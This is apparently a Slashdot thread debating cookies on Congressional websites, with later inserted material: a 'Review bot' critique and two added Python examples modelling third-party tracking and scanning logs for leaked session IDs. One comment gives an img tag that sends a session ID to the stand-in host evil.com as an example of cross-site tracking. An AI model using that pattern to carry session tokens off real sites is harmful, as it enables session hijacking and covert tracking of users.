More Cookie Investigations 201
FancyKetchup writes "This time, C|Net is caught up in cookie paranoia with their 'special investigation' into use of cookies on the Senate and House representative websites." From the article: "Sen. John McCain, R-Ariz., for instance, has been a longtime advocate of strict privacy laws to restrict commercial Web sites' data collection practices. In a statement posted on his own Web site, McCain assures visitors that 'I do not use 'cookies' or other means on my Web site to track your visit in any way.' But visiting mccain.senate.gov implants a cookie on the visitor's PC that will not expire until 2035. " Follow up to a story we reported on earlier.
Obviously... (Score:4, Funny)
Re:Obviously... (Score:3, Informative)
Re:Obviously... (Score:2)
Screw cookies, do something about spam.
If ISPs and States actually understood they can sue the spammers on their own turf. The spammers might start generating Frequent File Modules, but they're going to find themselves hip-deep pretty fast. And if they don't pay? Refer it to a collection agency. They give a rat's posterior unless|until it's a legitimate figure. The State AG or ISPs may not have the "Sue Spammer" money, it's not hurting anyone. So anything you get is gravy. Those collection agencies
Re:Obviously... (Score:3, Funny)
Amazing (Score:4, Funny)
Re:Amazing (Score:2, Funny)
bring_site_down();
notify_senator();
send_to_lawyers(download_slashdot_article(REFERER
spoof(404);
}
Re:Amazing (Score:2)
Re:Amazing [PATCH] (Score:2)
+++ x2 2006-01-07 01:02:10.000000000 -0600
@@ -1,7 +1,7 @@
if (REFERER == "http://slashdot.org") {
- bring_site_down();
notify_senator();
send_to_lawyers(download_slashdot_article(REFERER) );
spoof(404);
+ bring_site_down();
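Review bot: the context line `if (REFERER == "http://slashdot.org") {` tests for an exact match on the bare site URL, yet the body passes `REFERER` to `download_slashdot_article()`, which implies an article URL that this comparison would never equal; compare on the host or a URL prefix instead. Separately, the hunk header `@@ -1,7 +1,7 @@` declares seven lines per side while only five are shown, and the `---` old-file line and the closing `}` are absent, so the patch as posted would not apply cleanly.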
Re:Amazing (Score:1)
I wonder.... (Score:4, Insightful)
Re:I wonder.... (Score:1, Redundant)
Re:I wonder.... (Score:1)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:3, Interesting)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2, Informative)
Re:I wonder.... (Score:2)
Since most sites make it a habit to use 4, 5, 6 or more cookies, often with more than one domain, there are two possibilities: Web designers are complete morons (hey, it could happen), or there's something going on which more
Re:I wonder.... (Score:2)
They then pull out with that key everything they want from a database, independent from the cookie size.
That leaves us with
a)web designers being complete morons, or
b)site being composed of different web applications which all have their own demands for certain cookies to be set.
For instance main site app server + some web statistics software serving one image and a cookie + some ad serving software
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Wives standing behind their husbands while the browser automatically fills in the password for fsckingteens.com. Makes pretending he visited this site by mistake a little bit harder.
Re:I wonder.... (Score:2)
These days, it's the browser that does the auto-filling, not cookies.
It's not an either/or scenario either. Some uses of cookies are purely innocuous, others really do compromise your privacy. I don't blame end-users for not being able to tell the difference.
Re:I wonder.... (Score:2)
Also, I may be mistaken here, but as I understood it modern browsers would not allow other websites to read your cookies because your domain did not place them. I am aware of cross domain cookie capabilities between co-operating domains, but your one shot cookie was protected by a "sandbox."
Re:I wonder.... (Score:2)
Re:I wonder.... (Score:2)
Most Apache Websites have cookies. (Score:2)
Re:I wonder.... (Score:2)
I've not even seen one, and it sure can't be common.
Re:I wonder why MS and Mozilla ... (Score:2, Funny)
BTW, I have never accepted an Internet cookie in my life, and never intend to, and will quash any other technologies that I can (eg disabling Flash). Oh, and I don't mind typing in data, if I need to (actually, I never need to - sites which require my data are crosse
Lazy sensationalist journalism (Score:5, Informative)
Also, having a go at the White House for using WebTrends to collect and analyse visitor data is nuts. When you've got a busy and important site like that, good quality analytics are vital. If they didn't have them, you'd probably find the media criticising the White House for not knowing about their visitor demographics, popular pages etc etc.
That article really just smacks of lazy journalism. Whatever next.. discovering their PC has a "Temporary Internet Files" directory?
I use FireFox (Score:1)
What's a "Temporary Internet Files" directory?
Re:I use FireFox (Score:2)
I think they are referring to
=D
I can't quite make sense of this. (Score:2)
Re:I can't quite make sense of this. (Score:3, Interesting)
The trick is that the cookie can be linked to your personal information.
The classic "compromising cookie" scenario involves a cookie set by an embedded image from a different server [greenspun.com].
Say that Evil, Inc runs a banner server banners.evil.com, which puts ads on kinky.xxx and on yourchurch.org (or maybe just an invisible "web bug" on either site). When you visit kinky.xxx, your browser request
Re:I can't quite make sense of this. (Score:2)
That said, most people don't read dialog boxes unless it's something non-essential like an overwrite warning, in which case they call an IT tech. I don't expect a big flashing pink box saying "YOU HAVE A COOKIE! READ THIS AND I WILL EXPLAIN MORE!!!!LOLZ!!!1!!!!111!!!" to have any effect.
Re:Lazy sensationalist journalism (Score:3, Insightful)
I agree that this isn't a significant privacy issue. However, I think the real concern is that government websites are violating their own established privacy rules. In all these cases, it was probably an honest mistake, but people really should complain loudly any time any government agency seems to cons
Cookies are not all that evil (Score:3, Informative)
Re:Cookies are not all that evil (Score:3, Funny)
Re:Cookies are not all that evil (Score:2)
Re:Cookies are not all that evil (Score:2)
Re:Cookies are not all that evil (Score:2)
Re:Cookies are not all that evil (Score:2)
In the end it amounts to the exact same thing, a bit of information that identifies your account. Except as you pointed out in one case there is an extra manual step.
In both cases, someone who accesses your desktop account will be able to access your online account, so there's no real difference between both methods (especially since the login is plaintext).
Re:Cookies are not all that evil (Score:2)
Cookies are just cookies (Score:3, Insightful)
Re: More Cookie Investigations (Score:2, Insightful)
Secondly, what's all the fuss about? Cookies are incredibly harmless compared to everything else floating around the internets. Right?
Oh well. Damn politicians. I'm sure John McCain is perfectly correct. He, personally, does not use cookies to track people. He probably doesn't.
Re: More Cookie Investigations (Score:3, Interesting)
wrong wrong wrong.
First, just because there are a lot of other things floating around doesn't mean things perceived as minor should be ignored.
Do you know what started the 'don't track cookies' effort within the government? The white house was tracking people who had cookies from a marijuana advocacy site.
Re: More Cookie Investigations (Score:4, Funny)
Not that I don't believe you, I'd just like to read more on it.
Re: More Cookie Investigations (Score:3, Interesting)
http://www.cnn.com/2005/TECH/internet/12/29/spy.agency.privacy.ap/index.html [cnn.com]
relevant quote:
"The government first issued strict rules on cookies in 2000 after disclosures that the White House drug policy office had used the technology to track computer users viewing its online anti-drug advertising. Even a year later, a congressional study found 300 cookies still on the Web sites of 23 agencies."
however it still makes my point on one way a cookie can be used for malice
Re: More Cookie Investigations (Score:2)
Re: More Cookie Investigations (Score:2)
Re: More Cookie Investigations (Score:2)
whooboy. (Score:5, Insightful)
Because, as we all know, all politicians are fully versed in technology and its myriad uses.
Re:whooboy. (Score:1, Insightful)
If he allows statements to be attributed to him then he should take the time to find out whether they're true. Of course he's culpable if they aren't. There's no difference between a website and a speech that he got some guy to write for him in that regard.
Re:whooboy. (Score:2)
When confronted by the press about his website leaving cookies on people's computers, McCain apologized profusely, and promised that milk would be provided in the future.
Nothing to see here, move along. (Score:1, Troll)
Bush assures citizens that 'we get court orders to do wiretaps'
Why are we surprised?
I doubt McCain did this on purpose, but even if he did, should we be surprised?
I remember the last thread about cookies and the NSA had a lot of people saying 'this is nothing important' and I imagine we'll get the same comments again.
Here's the previous thread set to +3 [slashdot.org]
Re:Nothing to see here, move along. (Score:3, Insightful)
One thing I'm curious about, does Sen. McCain (or anyone in his employ) run McCain.Senate.Gov or is it all together on one server with all the other Senators' web sites? Basically, does he have any control over that site using cookies?
Executive Privilege (Score:3, Insightful)
"McCain assures visitors that 'I do not use 'cookies'
Bush assures citizens that 'we get court orders to do wiretaps'"
You know, this is the thing that really shorts my circuits sometimes. Here we have a president who has effectively admitted, "Yeah, so I attack foreign nations, imprison and torture anyone I want to, arbitrarily decide who's allowed to fly and who's not, spy on anyone I want to, whether the courts want me to or not." And people very earnestly debate whether this is a partisan issue, and if
Fix? (Score:3, Interesting)
Re:Fix? (Score:2)
And Firefox 1.5 has a delete things option from a menu bar.
What more could you want?
Re:Fix? (Score:2)
Comparison-shop on eBay and have to log in separately each time? No thanks!
Re:Fix? (Score:2)
WTF is up with that? Some annoying sites don't even have a rhyme or reason for opening up new windows. I can't tell you how many times on one of those poorly developed sites that I've closed the window instead of going back because they randomly open up new windows or reuse the first one. I don't care for firefox in general over Safari, but I wish Safari had the option to disallow opening up new windows.
Oh, and another trend. WTF is
Re:Fix? (Score:2)
Re:Fix? (Score:2, Informative)
Re:Fix? (Score:2)
Firefox extension (Score:2)
Re:Fix? (Score:2)
implants a cookie? (Score:2, Interesting)
For The Love Of FSM (Score:4, Informative)
Re:For The Love Of FSM (Score:2)
Stupid Question (Score:3, Insightful)
Oh, you didn't know that Flash is the new favorite means of tracking you? Hold onto your seat Tonto, you're about to get a wake up call! Flash is far more effective than any cookie ever was and no one seems to notice. Have a look at the contents of:
~/.macromedia
or
C:\Documents and Settings\User_Name\Application Data\Macromedia\
Re:Stupid Question (Score:2, Interesting)
Re:Stupid Question (Score:2)
So what? (Score:2)
Re:So what? (Score:2)
If the site doesn't use it (Score:2)
A thoroughly informative and useful article... not (Score:3, Informative)
Unique ID numbers? Cookies are (essentially) text files, that allow the web developer to write the limited amount of information they can gather on you (or more commonly anything they need to track from page to page) onto your machine so that it can be retrieved at a later date by the same web application that stored them.
The Unique ID number they are talking about is actually the Session ID allocated by the server that identifies an individual browser session. Shut down and then reopen your browser, and you'll (most likely) get a different session ID. The completely stuffed thing about the paranoia regarding cookies is that any information that the browser could determine about you (IP, the port you are using, the page you last visited in order to get to the current page) could simply be written to the server's database - irrespective of whether or not you have cookies enabled.
In the worst case, they can be used to invade privacy by correlating one person's visits to potentially thousands of different Web sites.
OMG - that'll end civilisation as we know it! Of course this assumes that some can get their hands on ALL your cookies. Perhaps with Netscape it wasn't so hard given they were all stored in a single file - but I would think (I've never tried myself but the how of it is not obvious) you would need some sort of ActiveX control or an exploit of some kind to be able to access Cookies other than those from your web site.
You're absolutely correct (Score:2)
OMG - that'll end civilisation as we know it! Of course this assumes that some can get their hands on ALL your cookies. Perhaps with Netscape it wasn't so hard given they were all stored in a single file - but I would think (I've never tried myself but the how of it is not obvious) you would need some sort of ActiveX control or an exploit of some kind to be able to ac
Re:You're absolutely correct (Score:2)
I suggest google.
A user can be exploited, and their information can be taken. Are you thinking a cookie is some sort of magic item that can be used to exploit something?
Here is a case where cookies were used to tell if you had clicked on ads about marijuana. Also the reason for the initial memo to remove cookies because they violate policy:
http://shns.scripps.com/shns/story [scripps.com]
Re:And while I think of it (Score:2)
It's not an "exploit." Site A includes doubleclick code on their site to show ads. Doubleclick code (a) reads cookie data for Site A's cookies on user's computer (which gets sent because the user is visiting Site A) and passes it via querystring or other method to doubleclick, and (b) registers a visit on Site A to doubleclick's database for the user identified by doubleclick's own cookie (which gets sent because the browser requests an ad on the doubleclick domain).
Get it now?
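Path (b) of the comment above, modelled as an added example that is not part of the original post: a toy browser sends each host only that host's own cookies, yet the ad server still links visits through its own cookie plus the Referer. The host names, the `uid` cookie and the host-only matching (no `Domain` attribute handling) are assumptions made for illustration.

```python
from urllib.parse import urlsplit


class CookieJar:
    """Toy browser jar: cookies are stored per host and sent back only to that host."""
    def __init__(self):
        self._by_host = {}

    def set(self, host, name, value):
        self._by_host.setdefault(host, {})[name] = value

    def cookies_for(self, host):
        return dict(self._by_host.get(host, {}))


class AdServer:
    """Third party: sees its own cookie and the Referer of the embedding page, nothing else."""
    def __init__(self, host):
        self.host = host
        self.visits = {}      # uid -> hosts of the pages that embedded the ad
        self._next_id = 1

    def serve(self, request):
        uid = request["cookies"].get("uid")
        set_cookie = None
        if uid is None:       # first contact: issue a new identifier
            uid = f"u{self._next_id}"
            self._next_id += 1
            set_cookie = ("uid", uid)
        self.visits.setdefault(uid, []).append(urlsplit(request["referer"]).hostname)
        return set_cookie


def load_page(jar, page_url, ad_server, block_third_party=False):
    """Fetch the ad embedded in page_url and return the request the ad server received."""
    page_host = urlsplit(page_url).hostname
    allow = not (block_third_party and ad_server.host != page_host)
    request = {
        "host": ad_server.host,
        "referer": page_url,
        "cookies": jar.cookies_for(ad_server.host) if allow else {},
    }
    set_cookie = ad_server.serve(request)
    if set_cookie and allow:  # a blocking browser neither sends nor stores the cookie
        jar.set(ad_server.host, *set_cookie)
    return request


def demo(block_third_party=False):
    jar = CookieJar()
    jar.set("site-a.example", "session", "constructed-value")  # first-party cookie
    ads = AdServer("ads.tracker.example")
    pages = ["http://site-a.example/article", "http://site-b.example/forum"]
    requests = [load_page(jar, p, ads, block_third_party) for p in pages]
    return requests, ads.visits
```

With `block_third_party=True` the two visits land under different identifiers, although the Referer still reaches the ad server on every request.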
Re:You're absolutely correct (Score:2)
Re:A thoroughly informative and useful article... (Score:2)
The Unique ID number they are talking about is actually the Session ID allocated by the server that identifies an individual browser session
No, actually, 99% of the time, the cookie is there to allow for unique identification, getting around the fact that http is stateless. This could be storing a username or a user id or something else. Session IDs are also often stored in cookies, but that really is not what they're talking about here.
Re:A thoroughly informative and useful article... (Score:2)
No, like I said in my comment, it's not "one use", it's the use 99% of the time. The whole point of cookies is to supplement stateless http with stateful information. Whether that stateful information is a number identifying further state info in a database or whether it is the stateful info itself doesn't matter.
I mentioned this in the first place because of your apparent misunderstanding of unique identification of cookies, here:
paranoia (Score:2, Informative)
Session strings instead (Score:5, Informative)
I wonder if the government anti-cookie rule / recommendation / whatever it is exactly, has caused some developers to avoid even session cookies by using URL strings instead. These are less secure than cookies because they end up in web logs, get bookmarked, emailed etc. Despite what another post said, I don't think cookie values generally end up in logs.
I admit to using session strings myself because a few years ago lots of people were scared into turning cookies off in their browser. That doesn't seem to be much of a problem these days. I hope this misguided publicity is not going to trigger a return of those days. Likewise for Javascript.
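An added example, not part of the original post, of auditing for the leak described above: it scans combined-format access log lines for session identifiers in request URLs and Referer headers, and flags any identifier requested from more than one client address, as happens when such a URL is bookmarked or emailed. The log lines are constructed, and `PHPSESSID` and the `;jsessionid=` path form are added to the parameter names mentioned in the thread.

```python
import hashlib
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names from the thread, plus PHP's default session name PHPSESSID.
SESSION_PARAMS = {"sessionid", "jsessionid", "phpsessionid", "phpsessid"}

# Apache/NCSA "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

# Constructed sample input (documentation address ranges, made-up identifiers).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jan/2006:01:02:10 -0600] "GET /cart?sessionid=abc123def456 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/Jan/2006:01:05:44 -0600] "GET /cart?sessionid=abc123def456 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Jan/2006:01:06:02 -0600] "GET /news HTTP/1.1" 200 900 "http://shop.example/view;jsessionid=ZZ99YY88?item=4" "Mozilla/5.0"',
    '203.0.113.8 - - [07/Jan/2006:01:07:00 -0600] "GET /index.html HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


def redact(value):
    """Stable short fingerprint, so the report does not repeat the live identifier."""
    return hashlib.sha256(value.encode()).hexdigest()[:8]


def session_params(url):
    """Return (name, value) pairs for session identifiers carried in a URL."""
    parts = urlsplit(url)
    found = [(k, v) for k, v in parse_qsl(parts.query) if k.lower() in SESSION_PARAMS]
    # Servlet-style URL rewriting puts the identifier in the path: /page;jsessionid=...
    for segment in parts.path.split(";")[1:]:
        name, _, value = segment.partition("=")
        if name.lower() in SESSION_PARAMS:
            found.append((name, value))
    return found


def scan(lines):
    """Return (findings, shared): every exposure, and identifiers seen from >1 client IP."""
    findings, ips_by_sid = [], {}
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        for field in ("target", "referer"):
            for name, value in session_params(match[field]):
                findings.append((number, field, name.lower(), redact(value)))
                if field == "target":
                    ips_by_sid.setdefault(redact(value), set()).add(match["ip"])
    shared = {sid: sorted(ips) for sid, ips in ips_by_sid.items() if len(ips) > 1}
    return findings, shared
```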
Re:Session strings instead (Score:3, Interesting)
Yes, that is what I was thinking. We all love PHP right? And those long unique autogenerated PHPSESSIONIDs are perfect for cross site information transfer.
<img src="http://evil.com/foo.jpg?PHPSESSIONID=xyxxyxyxy">
These are done in spam mail all the time. I'm not sure if mail programs by default still show images, but it is common for them to have images that have appended your email address in some way to verify you got the
Someone needs to tell them about HTTP Sessions (Score:3, Insightful)
As far as I have seen from experience, the vast majority of cookies in use today are merely for storing a user's session key. They just store your virtual "connected" status (with the otherwise connectionless HTTP) for the duration of your visit to the site, and expire and are discarded after a few minutes of idleness (usually 30 minutes).
Of course, it would be nice to not have session cookies at all, but it appears to the user to be the most transparent. The other main method is to have a session key in the URI. How many times have you seen "?sessionid='somedata'" or "?JSESSIONID='somedata'" appended to the end of a URL?
The other ways, such as hashing the agent's info (ip address, browser, etc) on the server and doing a lookup for every page request, or passing the data back and forth in 'type=hidden' form fields, are less reliable.
I think that if someone would tell the media this missing bit of info, the hype might fade, if only temporarily. There are too many Chicken Littles (Cassandras?) in the world for paranoia to take a permanent holiday.
Re:Someone needs to tell them about HTTP Sessions (Score:2, Funny)
Heh (Score:2)
Do you think cookies are evil? (Score:2, Informative)
http://www.macromedia.com/support/documentation/e
The Ominous Strawman (Score:2)
This is getting pretty outrageous (Score:2)
You don't need cookies to track people online. IP plus browser string works fine if the number of users is small enough. In most online forums, I can (if I wanted) track forum members just by checking my server log for hits to my linked avatar. Without any setup/work required on my part, just with the host's default server settings, it tells me their ip address, the referer (which of my posts they were reading), when they viewed it,
Missing the real point? No... (Score:2)
Self Slashdoting Host (SSH) (Score:2, Funny)
Sorry, the http://mccain.senate.gov/ [senate.gov] web page you have requested is experiencing technical difficulties. The Webmaster has been alerted.
You will be automatically redirected to the http://mccain.senate.gov/ [senate.gov] Home page after 10 seconds.
I love sites that slashdot themselves. It takes the work away from actually having to pound the refresh button
My .gov list (Score:2)
At least it's a bipartisan issue. I'd better delete them quickly or people might think I stay informed about my government. Good thing aljazeera.net doesn't set a cookie or
Internet Violates Privacy (Score:2)
GOVERNMENT SECRETLY TRACKS CITIZENS
Washington, D.C.-- A secret group of contractors, hired by the White House, have started tracking the movements of citizens in an information kiosk set up outside the Capitol building.
"This is a blatant violation of privacy," said Murtaugh King, privacy advocate and internet blogger. "What they are doing fundamentally violates the constitution."
According to a White House spokesman, the information kiosk was set up outside the capitol building as a way to giv
Re:"i did not have sex with that cookie" (Score:2)
Re:"i did not have sex with that cookie" (Score:4, Funny)
Re:Why I Distrust Cookies (Score:2)
With browser closed, go into the tree and delete cookies. Open browser, go to sites you don't mind having cookies from (this one and others you don't want to log into 10x times a day, I like most, am lazy). Close browser, go back to tree, save cookies as cookies2. After each use of the browser go to the tree and delete cookies, save cookies2 as cookies. Next time you open the browser you have the cookie file you want, for your use, not what all the site wa
Re:I can't see how anyone can blame the site... (Score:2)
Re:BS (Score:2)